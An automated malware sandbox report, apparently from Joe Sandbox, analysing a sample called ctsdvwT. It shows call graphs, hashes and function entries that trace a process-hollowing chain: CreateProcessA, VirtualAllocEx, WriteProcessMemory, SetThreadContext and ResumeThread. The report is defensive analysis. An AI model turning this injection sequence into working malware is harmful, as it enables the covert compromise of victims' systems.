API calls 20661->20677 20662->20672 20663->20672 20664->20672 20665->20672 20666->20672 20667->20672 20668->20672 20669->20672 20670->20672 20671->20672 20672->20638 20673->20672 20674->20672 20675->20672 20676->20672 20677->20672 20679 6097be4 20678->20679 20680 6097c59 20678->20680 20681 6098129 2 API calls 20679->20681 20682 609884b 2 API calls 20679->20682 20683 60985ab 2 API calls 20679->20683 20684 609802b 2 API calls 20679->20684 20685 60981aa 4 API calls 20679->20685 20686 60982cc 2 API calls 20679->20686 20687 60984ef 2 API calls 20679->20687 20688 6098123 2 API calls 20679->20688 20689 6098483 2 API calls 20679->20689 20690 6098107 2 API calls 20679->20690 20691 6097c12 20679->20691 20692 60983c6 2 API calls 20679->20692 20693 60981bd 2 API calls 20679->20693 20694 60986bc 2 API calls 20679->20694 20695 6098890 2 API calls 20679->20695 20696 60981f7 2 API calls 20679->20696 20680->20638 20681->20691 20682->20691 20683->20691 20684->20691 20685->20691 20686->20691 20687->20691 20688->20691 20689->20691 20690->20691 20691->20638 20692->20691 20693->20691 20694->20691 20695->20691 20696->20691 20698 6098152 20697->20698 20774 6095da8 20698->20774 20778 6095da0 20698->20778 20699 6098167 20699->20654 20782 6096368 20702->20782 20786 6096360 20702->20786 20703 6098227 20703->20654 20707 6098896 20706->20707 20708 60988b9 20707->20708 20791 6096518 20707->20791 20795 6096510 20707->20795 20713 60980fd 20711->20713 20712 609810f 20713->20711 20713->20712 20799 6096428 20713->20799 20803 6096421 20713->20803 20718 60980fd 20716->20718 20717 609810f 20718->20717 20719 6096428 WriteProcessMemory 20718->20719 20720 6096421 WriteProcessMemory 20718->20720 20719->20718 20720->20718 20723 6096428 WriteProcessMemory 20721->20723 20724 6096421 WriteProcessMemory 20721->20724 20722 60983f4 20723->20722 20724->20722 20726 60980fd 20725->20726 20727 609810f 20726->20727 20728 6096428 WriteProcessMemory 20726->20728 20729 6096421 WriteProcessMemory 20726->20729 20728->20726 20729->20726 20731 6098152 20730->20731 20732 609851d 20731->20732 20734 6095da8 ResumeThread 20731->20734 20735 6095da0 ResumeThread 20731->20735 20732->20654 20733 6098167 20733->20654 20734->20733 20735->20733 20737 60980fd 20736->20737 20738 609810f 20737->20738 20739 6096428 WriteProcessMemory 20737->20739 20740 6096421 WriteProcessMemory 20737->20740 20739->20737 20740->20737 20742 6098637 20741->20742 20807 6095e58 20742->20807 20811 6095e50 20742->20811 20743 6098652 20747 60982f5 20746->20747 20749 6096518 ReadProcessMemory 20747->20749 20750 6096510 ReadProcessMemory 20747->20750 20748 60988b9 20749->20748 20750->20748 20752 60982f5 20751->20752 20753 60981b7 20751->20753 20754 6098a8a 20752->20754 20756 6096518 ReadProcessMemory 20752->20756 20757 6096510 ReadProcessMemory 20752->20757 20753->20752 20815 6098c70 20753->20815 20820 6098c62 20753->20820 20755 60988b9 20756->20755 20757->20755 20761 609804a 20760->20761 20825 60966b0 20761->20825 20829 60966a4 20761->20829 20767 6096428 WriteProcessMemory 20765->20767 20768 6096421 WriteProcessMemory 20765->20768 20766 60985cf 20767->20766 20768->20766 20770 60982f6 20769->20770 20772 6096518 ReadProcessMemory 20770->20772 20773 6096510 ReadProcessMemory 20770->20773 20771 60988b9 20772->20771 20773->20771 20775 6095de8 ResumeThread 20774->20775 20777 6095e19 20775->20777 20777->20699 20779 6095de8 ResumeThread 20778->20779 20781 6095e19 20779->20781 20781->20699 20783 60963a8 VirtualAllocEx 20782->20783 20785 60963e5 20783->20785 20785->20703 20787 6096366 VirtualAllocEx 20786->20787 20788 60962f7 20786->20788 20790 60963e5 20787->20790 20788->20703 20790->20703 20792 6096563 ReadProcessMemory 20791->20792 20794 60965a7 20792->20794 20794->20708 20796 6096518 ReadProcessMemory 20795->20796 20798 60965a7 20796->20798 20798->20708 20800 6096470 WriteProcessMemory 20799->20800 20802 60964c7 20800->20802 20802->20713 20804 6096470 WriteProcessMemory 20803->20804 20806 60964c7 20804->20806 20806->20713 20808 6095e9d Wow64SetThreadContext 20807->20808 20810 6095ee5 20808->20810 20810->20743 20812 6095e58 Wow64SetThreadContext 20811->20812 20814 6095ee5 20812->20814 20814->20743 20816 6098c85 20815->20816 20818 6095e58 Wow64SetThreadContext 20816->20818 20819 6095e50 Wow64SetThreadContext 20816->20819 20817 6098c9b 20817->20752 20818->20817 20819->20817 20821 6098c70 20820->20821 20823 6095e58 Wow64SetThreadContext 20821->20823 20824 6095e50 Wow64SetThreadContext 20821->20824 20822 6098c9b 20822->20752 20823->20822 20824->20822 20826 6096739 CreateProcessA 20825->20826 20828 60968fb 20826->20828 20830 60966b0 CreateProcessA 20829->20830 20832 60968fb 20830->20832 20611 6098e00 20612 6098f8b 20611->20612 20613 6098e26 20611->20613 20613->20612 20616 6099078 PostMessageW 20613->20616 20618 6099080 PostMessageW 20613->20618 20617 60990ec 20616->20617 20617->20613 20619 60990ec 20618->20619 20619->20613 20620 131d0b8 20621 131d0fe GetCurrentProcess 20620->20621 20623 131d150 GetCurrentThread 20621->20623 20624 131d149 20621->20624 20625 131d186 20623->20625 20626 131d18d GetCurrentProcess 20623->20626 20624->20623 20625->20626 20629 131d1c3 20626->20629 20627 131d1eb GetCurrentThreadId 20628 131d21c 20627->20628 20629->20627 20833 1314668 20834 131467a 20833->20834 20835 1314686 20834->20835 20839 1314783 20834->20839 20844 1313e1c 20835->20844 20837 13146a5 20840 131479d 20839->20840 20848 1314883 20840->20848 20852 1314888 20840->20852 20845 1313e27 20844->20845 20860 1315c1c 20845->20860 20847 1316ff0 20847->20837 20850 1314888 20848->20850 20849 131498c 20849->20849 20850->20849 20856 131449c 20850->20856 20854 13148af 20852->20854 20853 131498c 20853->20853 20854->20853 20855 131449c CreateActCtxA 20854->20855 20855->20853 20857 1315918 CreateActCtxA 20856->20857 20859 13159db 20857->20859 20861 1315c27 20860->20861 20864 1315c3c 20861->20864 20863 1317095 20863->20847 20865 1315c47 20864->20865 20868 1315c6c 20865->20868 20867 131717a 20867->20863 20869 1315c77 20868->20869 20872 1315c9c 20869->20872 20871 131726d 20871->20867 20873 1315ca7 20872->20873 20875 1318653 20873->20875 20878 131ad03 20873->20878 20874 1318691 20874->20871 20875->20874 20882 131cdf4 20875->20882 20887 131ad33 20878->20887 20892 131ad38 20878->20892 20879 131ad16 20879->20875 20883 131ce11 20882->20883 20884 131ce35 20883->20884 20918 131cfa0 20883->20918 20922 131cf8f 20883->20922 20884->20874 20888 131ad38 20887->20888 20896 131ae30 20888->20896 20901 131ae23 20888->20901 20889 131ad47 20889->20879 20894 131ae30 LoadLibraryExW 20892->20894 20895 131ae23 LoadLibraryExW 20892->20895 20893 131ad47 20893->20879 20894->20893 20895->20893 20897 131ae41 20896->20897 20898 131ae5c 20896->20898 20897->20898 20906 131b0c3 20897->20906 20910 131b0c8 20897->20910 20898->20889 20902 131ae41 20901->20902 20903 131ae5c 20901->20903 20902->20903 20904 131b0c3 LoadLibraryExW 20902->20904 20905 131b0c8 LoadLibraryExW 20902->20905 20903->20889 20904->20903 20905->20903 20908 131b0c8 20906->20908 20907 131b101 20907->20898 20908->20907 20914 131a870 20908->20914 20911 131b0dc 20910->20911 20912 131b101 20911->20912 20913 131a870 LoadLibraryExW 20911->20913 20912->20898 20913->20912 20915 131b2a8 LoadLibraryExW 20914->20915 20917 131b321 20915->20917 20917->20907 20919 131cfad 20918->20919 20920 131cfe7 20919->20920 20926 131c8d8 20919->20926 20920->20884 20923 131cfad 20922->20923 20924 131cfe7 20923->20924 20925 131c8d8 LoadLibraryExW 20923->20925 20924->20884 20925->20924 20927 131c8dd 20926->20927 20929 131d8f8 20927->20929 20930 131ca04 20927->20930 20929->20929 20931 131ca0f 20930->20931 20932 1315c9c LoadLibraryExW 20931->20932 20933 131d967 20932->20933 20933->20929

                                Executed Functions

                                Function 0131D0B3 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0131D136
                                • GetCurrentThread.KERNEL32 ref: 0131D173
                                • GetCurrentProcess.KERNEL32 ref: 0131D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0131D209
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: b28bd1dcad2a6ffd7f99d53c8e19bbdaded98f1047d99620dfdcefe6e555394c
                                • Instruction ID: 8d7370d517adaa65dcdaac927dd62a6f0bc7b37ac0d00475c308e5cb1c5990c6
                                • Opcode Fuzzy Hash: b28bd1dcad2a6ffd7f99d53c8e19bbdaded98f1047d99620dfdcefe6e555394c
                                • Instruction Fuzzy Hash: C15169B0900709CFDB48CFAAD588BEEBBF1AF49314F208469E059A73A1D7749944CB65
                                Function 0131D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0131D136
                                • GetCurrentThread.KERNEL32 ref: 0131D173
                                • GetCurrentProcess.KERNEL32 ref: 0131D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0131D209
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: ac122557e7167c8e804d9fefecad8f3819030964ae20b16516fec7dd302036e4
                                • Instruction ID: fcd36ff913985f8dda2cc01b44e3f60e9932fa9fb0319e28a77a55dd526d7d37
                                • Opcode Fuzzy Hash: ac122557e7167c8e804d9fefecad8f3819030964ae20b16516fec7dd302036e4
                                • Instruction Fuzzy Hash: 295158B0900709CFDB58CFA9D588BDEBBF1BF49314F208469E059A73A0DB749944CB65
                                Function 060966A4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 45 60966a4-6096745 48 609677e-609679e 45->48 49 6096747-6096751 45->49 56 60967a0-60967aa 48->56 57 60967d7-6096806 48->57 49->48 50 6096753-6096755 49->50 51 6096778-609677b 50->51 52 6096757-6096761 50->52 51->48 54 6096763 52->54 55 6096765-6096774 52->55 54->55 55->55 58 6096776 55->58 56->57 59 60967ac-60967ae 56->59 63 6096808-6096812 57->63 64 609683f-60968f9 CreateProcessA 57->64 58->51 61 60967d1-60967d4 59->61 62 60967b0-60967ba 59->62 61->57 65 60967bc 62->65 66 60967be-60967cd 62->66 63->64 67 6096814-6096816 63->67 77 60968fb-6096901 64->77 78 6096902-6096988 64->78 65->66 66->66 68 60967cf 66->68 69 6096839-609683c 67->69 70 6096818-6096822 67->70 68->61 69->64 72 6096824 70->72 73 6096826-6096835 70->73 72->73 73->73 74 6096837 73->74 74->69 77->78 88 6096998-609699c 78->88 89 609698a-609698e 78->89 91 60969ac-60969b0 88->91 92 609699e-60969a2 88->92 89->88 90 6096990 89->90 90->88 94 60969c0-60969c4 91->94 95 60969b2-60969b6 91->95 92->91 93 60969a4 92->93 93->91 96 60969d6-60969dd 94->96 97 60969c6-60969cc 94->97 95->94 98 60969b8 95->98 99 60969df-60969ee 96->99 100 60969f4 96->100 97->96 98->94 99->100 102 60969f5 100->102 102->102
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060968E6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 8ece3d3dbae8da75a030de012bc9fb088168f48616606356a6064de616352377
                                • Instruction ID: ac6f5941408a391c3c9dcbfb46c450e3d67ee1a27c4c0a2e220a8db8ad501252
                                • Opcode Fuzzy Hash: 8ece3d3dbae8da75a030de012bc9fb088168f48616606356a6064de616352377
                                • Instruction Fuzzy Hash: 61A16C71D102198FEF54CFA8C840BEEBBF2BF44310F1485A9E859A7240DB759985DFA1
                                Function 060966B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 103 60966b0-6096745 105 609677e-609679e 103->105 106 6096747-6096751 103->106 113 60967a0-60967aa 105->113 114 60967d7-6096806 105->114 106->105 107 6096753-6096755 106->107 108 6096778-609677b 107->108 109 6096757-6096761 107->109 108->105 111 6096763 109->111 112 6096765-6096774 109->112 111->112 112->112 115 6096776 112->115 113->114 116 60967ac-60967ae 113->116 120 6096808-6096812 114->120 121 609683f-60968f9 CreateProcessA 114->121 115->108 118 60967d1-60967d4 116->118 119 60967b0-60967ba 116->119 118->114 122 60967bc 119->122 123 60967be-60967cd 119->123 120->121 124 6096814-6096816 120->124 134 60968fb-6096901 121->134 135 6096902-6096988 121->135 122->123 123->123 125 60967cf 123->125 126 6096839-609683c 124->126 127 6096818-6096822 124->127 125->118 126->121 129 6096824 127->129 130 6096826-6096835 127->130 129->130 130->130 131 6096837 130->131 131->126 134->135 145 6096998-609699c 135->145 146 609698a-609698e 135->146 148 60969ac-60969b0 145->148 149 609699e-60969a2 145->149 146->145 147 6096990 146->147 147->145 151 60969c0-60969c4 148->151 152 60969b2-60969b6 148->152 149->148 150 60969a4 149->150 150->148 153 60969d6-60969dd 151->153 154 60969c6-60969cc 151->154 152->151 155 60969b8 152->155 156 60969df-60969ee 153->156 157 60969f4 153->157 154->153 155->151 156->157 159 60969f5 157->159 159->159
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060968E6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0b2a4940af4c1a023d3b088dfdc12df939029815d21458e623234ae1432f8748
                                • Instruction ID: 0cdad6db2702da57a9c150f64d0ccaf79875b29a22527555ebd64d7338be36d6
                                • Opcode Fuzzy Hash: 0b2a4940af4c1a023d3b088dfdc12df939029815d21458e623234ae1432f8748
                                • Instruction Fuzzy Hash: 9B916C71D102198FEF94DFA8C8407AEBBF2FF44300F048569D859A7240DB759985DFA1
                                Function 0131449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 160 131449c-13159d9 CreateActCtxA 163 13159e2-1315a3c 160->163 164 13159db-13159e1 160->164 171 1315a4b-1315a4f 163->171 172 1315a3e-1315a41 163->172 164->163 173 1315a51-1315a5d 171->173 174 1315a60 171->174 172->171 173->174 176 1315a61 174->176 176->176
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013159C9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b91aeab1bbcf844adfe9ab6fab7c7dbf8338cf5c75e1018185bcb5987e5722cf
                                • Instruction ID: 962aacb1625fcf85e441f2249339eb52a89c3bad5620e8e71244b12c382357fb
                                • Opcode Fuzzy Hash: b91aeab1bbcf844adfe9ab6fab7c7dbf8338cf5c75e1018185bcb5987e5722cf
                                • Instruction Fuzzy Hash: 1041E371C0071DCBEB24DFAAC884B9EBBB5BF49304F20806AD519AB255DBB16945CF90
                                Function 0131590F Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 177 131590f 178 131591c-13159d9 CreateActCtxA 177->178 180 13159e2-1315a3c 178->180 181 13159db-13159e1 178->181 188 1315a4b-1315a4f 180->188 189 1315a3e-1315a41 180->189 181->180 190 1315a51-1315a5d 188->190 191 1315a60 188->191 189->188 190->191 193 1315a61 191->193 193->193
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 013159C9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: d5bb1e62898807a43519a1d5a6cbf5ee40ebe2c67d455e507e2eb47a9e4ae0cf
                                • Instruction ID: 55045c1650447cb81ad812c9b6d423aa644407aab75fcc1b2523c2206bd153e1
                                • Opcode Fuzzy Hash: d5bb1e62898807a43519a1d5a6cbf5ee40ebe2c67d455e507e2eb47a9e4ae0cf
                                • Instruction Fuzzy Hash: 5B41E371C00719CFEB24CFA9C8847CDBBB5BF49304F24806AD559AB255DB715945CF90
                                Function 06096360 Relevance: 1.6, APIs: 1, Instructions: 88memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 194 6096360-6096364 195 60962f7-6096333 194->195 196 6096366-60963e3 VirtualAllocEx 194->196 200 609633d 195->200 201 6096335-609633b 195->201 204 60963ec-6096411 196->204 205 60963e5-60963eb 196->205 202 6096340-6096355 200->202 201->202 205->204
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060963D6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e9af19c6f54fc801f97d3322b6347f558ee26fbc601d4574c43ed5134ee8d8a0
                                • Instruction ID: 3a89f36be82ac279aa97616266e13faf4ff1fe7512e5f17eae6d65f4f050b7d5
                                • Opcode Fuzzy Hash: e9af19c6f54fc801f97d3322b6347f558ee26fbc601d4574c43ed5134ee8d8a0
                                • Instruction Fuzzy Hash: 2C3146719002499FDF10DFA9D844BEEFBF5EF48320F20802AE955AB251C776A940CFA0
                                Function 06096421 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 211 6096421-6096476 213 6096478-6096484 211->213 214 6096486-60964c5 WriteProcessMemory 211->214 213->214 216 60964ce-60964fe 214->216 217 60964c7-60964cd 214->217 217->216
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 060964B8
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: a866ec5eacb26a0d2b16c10d1c141ed25b6c39b1e2fd9f8a96ee8e1fc5210aa0
                                • Instruction ID: 15e1f73e701c40d9bbc80b7005b6c9c53acc10614b08f4f21ab5af3065882298
                                • Opcode Fuzzy Hash: a866ec5eacb26a0d2b16c10d1c141ed25b6c39b1e2fd9f8a96ee8e1fc5210aa0
                                • Instruction Fuzzy Hash: 262124B19003499FDF50CFA9C884BEEBBF1FB48310F14842AE959A7241C7799954DBA0
                                Function 06096428 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 221 6096428-6096476 223 6096478-6096484 221->223 224 6096486-60964c5 WriteProcessMemory 221->224 223->224 226 60964ce-60964fe 224->226 227 60964c7-60964cd 224->227 227->226
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 060964B8
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 893f5329273c3452dd918d388ce2e5066843d4fb4aaf450049ec61c4b9e84015
                                • Instruction ID: 269c0048fca6f6bd72265aaf43e7f1267e9edc3a6abe08d2d680098177699bc4
                                • Opcode Fuzzy Hash: 893f5329273c3452dd918d388ce2e5066843d4fb4aaf450049ec61c4b9e84015
                                • Instruction Fuzzy Hash: 9E2144B19003099FDF40CFAAC880BEEBBF5FF48310F10842AE958A7241C7799944CBA0
                                Function 06096510 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 231 6096510-60965a5 ReadProcessMemory 235 60965ae-60965de 231->235 236 60965a7-60965ad 231->236 236->235
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06096598
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: bcb71a74f382a3424fc06cce50f09c053a20426631a5ee98c07a3b79c6991bcc
                                • Instruction ID: 675bca9f55cba1d01f41a1a27e89210258f618a4ee30f29ca305bbc18e14e71c
                                • Opcode Fuzzy Hash: bcb71a74f382a3424fc06cce50f09c053a20426631a5ee98c07a3b79c6991bcc
                                • Instruction Fuzzy Hash: 442125B18003499FDF10DFAAC880BEEBBF5FF48310F54842AE959A7241C7759940DBA0
                                Function 0131D2FB Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 240 131d2fb-131d2fe 241 131d300-131d394 DuplicateHandle 240->241 242 131d396-131d39c 241->242 243 131d39d-131d3ba 241->243 242->243
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0131D387
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 241922351567d492465e3d6b7395913e8b887c63c6e3fa745bffd54664957820
                                • Instruction ID: c92c7b6dfa251f55bbe3fb634f7385e53775f2ac81a52f2140363238893d1aff
                                • Opcode Fuzzy Hash: 241922351567d492465e3d6b7395913e8b887c63c6e3fa745bffd54664957820
                                • Instruction Fuzzy Hash: 832103B5D00348DFDB10CFAAD884AEEBBF4EB48310F14842AE958A3251C374A954CFA1
                                Function 06095E50 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 246 6095e50-6095ea3 249 6095eb3-6095ee3 Wow64SetThreadContext 246->249 250 6095ea5-6095eb1 246->250 252 6095eec-6095f1c 249->252 253 6095ee5-6095eeb 249->253 250->249 253->252
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06095ED6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 5104d3d10ef6e69d74aa918f1d133f390d00c8a9c1dc5a446379ae234884a7b0
                                • Instruction ID: 471d14449d906c685636ce829988e4e24068b89fe89a74d489ce737aa01d0e54
                                • Opcode Fuzzy Hash: 5104d3d10ef6e69d74aa918f1d133f390d00c8a9c1dc5a446379ae234884a7b0
                                • Instruction Fuzzy Hash: 80218971D003099FDB50CFAAC8857EEBBF5EF48310F148429D458A7241CB789944CFA0
                                Function 06095E58 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 257 6095e58-6095ea3 259 6095eb3-6095ee3 Wow64SetThreadContext 257->259 260 6095ea5-6095eb1 257->260 262 6095eec-6095f1c 259->262 263 6095ee5-6095eeb 259->263 260->259 263->262
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06095ED6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: c02c513bbf4176203b7b73d04f9ba201319c315514e88432347932c48197d0dd
                                • Instruction ID: dba4743d7087982b34e64c2e61038883b52176931e3e7691b11de8f409515574
                                • Opcode Fuzzy Hash: c02c513bbf4176203b7b73d04f9ba201319c315514e88432347932c48197d0dd
                                • Instruction Fuzzy Hash: AB214771D003098FDB54DFAAC8857EEBBF5EF48310F54842AD859A7281DBB89944CFA4
                                Function 06096518 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 267 6096518-60965a5 ReadProcessMemory 270 60965ae-60965de 267->270 271 60965a7-60965ad 267->271 271->270
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06096598
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1577221808.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_6090000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0149469a6e05638c2555f66247bb9e19d2a8f95659e6ae90ad5071f0f72835d6
                                • Instruction ID: eacfdbd4710dafbabeff0479ab4f56dff0c2281e5a60d71b8df5dcbf8b41be1d
                                • Opcode Fuzzy Hash: 0149469a6e05638c2555f66247bb9e19d2a8f95659e6ae90ad5071f0f72835d6
                                • Instruction Fuzzy Hash: D32114B18003499FDF10DFAAC880BEEBBF5FF48310F50842AE959A7241C7799940DBA4
                                Function 0131D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 275 131d300-131d394 DuplicateHandle 276 131d396-131d39c 275->276 277 131d39d-131d3ba 275->277 276->277
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0131D387
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 68191937cf53c89a0d82ad63d46e54b4da2de1a5c6e2c1f260a8ff570a417fcd
                                • Instruction ID: 90deb877c1ca63280960e9486cd832f9b16123d08dc905630ac2ab99fb32f013
                                • Opcode Fuzzy Hash: 68191937cf53c89a0d82ad63d46e54b4da2de1a5c6e2c1f260a8ff570a417fcd
                                • Instruction Fuzzy Hash: A421E2B59003089FDB10CFAAD884ADEBBF9FB48310F14842AE958A3350C374A954CFA0
                                Function 0131A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0131B101,00000800,00000000,00000000), ref: 0131B312
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1567055902.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_1310000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 3107352869a1b2cde35ca0e42d321e5b1bd4e6cb16ccb1659a8445dc59041a25
                                • Instruction ID: 9aed713e6bb95f4ea878df690353dbe32a029bf1b1eb3d61e109ff8f4badd24b
